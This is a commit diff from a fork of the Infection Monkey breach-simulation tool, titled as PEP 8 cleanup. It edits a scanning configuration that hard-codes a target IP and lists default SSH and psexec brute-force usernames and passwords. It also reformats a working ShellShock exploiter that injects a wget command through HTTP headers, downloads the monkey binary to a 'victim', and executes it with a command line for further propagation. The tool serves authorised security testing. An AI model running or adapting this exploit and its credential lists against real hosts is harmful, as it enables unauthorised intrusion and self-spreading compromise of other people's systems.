forked from p15670423/monkey
PEP 8 changes
This commit is contained in:
parent
1806f9bc62
commit
cd27438a1e
|
@ -135,7 +135,7 @@ class Configuration(object):
|
||||||
scanner_class = TcpScanner
|
scanner_class = TcpScanner
|
||||||
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
|
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
|
||||||
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
|
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
|
||||||
SSHExploiter, ShellShockExploiter #Linux
|
SSHExploiter #Linux
|
||||||
]
|
]
|
||||||
|
|
||||||
# how many victims to look for in a single scan iteration
|
# how many victims to look for in a single scan iteration
|
||||||
|
@ -167,11 +167,11 @@ class Configuration(object):
|
||||||
###########################
|
###########################
|
||||||
|
|
||||||
# Auto detect and scan local subnets
|
# Auto detect and scan local subnets
|
||||||
local_network_scan = True
|
local_network_scan = False
|
||||||
|
|
||||||
range_class = FixedRange
|
range_class = FixedRange
|
||||||
range_size = 1
|
range_size = 1
|
||||||
range_fixed = ['']
|
range_fixed = ['10.0.1.160']
|
||||||
|
|
||||||
# TCP Scanner
|
# TCP Scanner
|
||||||
HTTP_PORTS = [80, 8080, 443,
|
HTTP_PORTS = [80, 8080, 443,
|
||||||
|
@ -201,7 +201,7 @@ class Configuration(object):
|
||||||
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
|
psexec_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||||
|
|
||||||
# ssh exploiter
|
# ssh exploiter
|
||||||
ssh_users = ["root"]
|
ssh_users = ["root",'user']
|
||||||
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
|
ssh_passwords = ["Password1!", "1234", "password", "12345678"]
|
||||||
|
|
||||||
# rdp exploiter
|
# rdp exploiter
|
||||||
|
|
|
@ -16,7 +16,6 @@ __author__ = 'danielg'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
TIMEOUT = 2
|
TIMEOUT = 2
|
||||||
DOWNLOAD_TIMEOUT = 60
|
|
||||||
TEST_COMMAND = '/bin/uname -a'
|
TEST_COMMAND = '/bin/uname -a'
|
||||||
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
|
||||||
|
|
||||||
|
@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
|
|
||||||
LOG.info(
|
LOG.info(
|
||||||
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
|
'Scanning %s, ports [%s] for vulnerable CGI pages' % (
|
||||||
host, ",".join([str(port[0]) for port in valid_ports]))
|
host, ",".join([str(port[0]) for port in valid_ports]))
|
||||||
)
|
)
|
||||||
|
|
||||||
attackable_urls = []
|
attackable_urls = []
|
||||||
|
@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
|
||||||
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
src_path = src_path or get_target_monkey(host)
|
|
||||||
|
|
||||||
|
|
||||||
# copy the monkey
|
# copy the monkey
|
||||||
dropper_target_path_linux = self._config.dropper_target_path_linux
|
dropper_target_path_linux = self._config.dropper_target_path_linux
|
||||||
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
LOG.info("Host %s was already infected under the current configuration, done" % host)
|
||||||
return True # return already infected
|
return True # return already infected
|
||||||
|
|
||||||
|
src_path = src_path or get_target_monkey(host)
|
||||||
if not src_path:
|
if not src_path:
|
||||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||||
return False
|
return False
|
||||||
|
@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
|
||||||
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
download_command = '/usr/bin/wget %s -O %s;' % (
|
download_command = '/usr/bin/wget %s -O %s;' % (
|
||||||
http_path, dropper_target_path_linux)
|
http_path, dropper_target_path_linux)
|
||||||
|
|
||||||
download_and_run = exploit + download_command
|
download = exploit + download_command
|
||||||
resp = self.attack_page(url, header, download_and_run)
|
self.attack_page(url, header, download)
|
||||||
|
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
|
|
||||||
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
if (http_thread.downloads != 1) or (
|
||||||
|
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
|
||||||
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
|
||||||
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
|
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
|
||||||
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
|
cmdline += build_monkey_commandline(host, depth - 1) + ' & '
|
||||||
run_path = exploit + cmdline
|
run_path = exploit + cmdline
|
||||||
resp = self.attack_page(url, header, run_path)
|
self.attack_page(url, header, run_path)
|
||||||
|
|
||||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
||||||
self._config.dropper_target_path_linux, host, cmdline)
|
self._config.dropper_target_path_linux, host, cmdline)
|
||||||
|
|
||||||
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)):
|
if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
|
||||||
LOG.info("Failed running the monkey, log file does not exist")
|
LOG.info("Failed running the monkey, log file does not exist")
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter):
|
||||||
return urls
|
return urls
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def report_vuln_shellshock(host,url):
|
def report_vuln_shellshock(host, url):
|
||||||
from control import ControlClient
|
from control import ControlClient
|
||||||
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
|
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
|
||||||
'exploiter': ShellShockExploiter.__name__,
|
'exploiter': ShellShockExploiter.__name__,
|
||||||
|
|
|
@ -426,3 +426,4 @@ def report_failed_login(exploiter, machine, user, password):
|
||||||
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
|
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
|
||||||
'exploiter': exploiter.__class__.__name__,
|
'exploiter': exploiter.__class__.__name__,
|
||||||
'user':user,'password':password})
|
'user':user,'password':password})
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue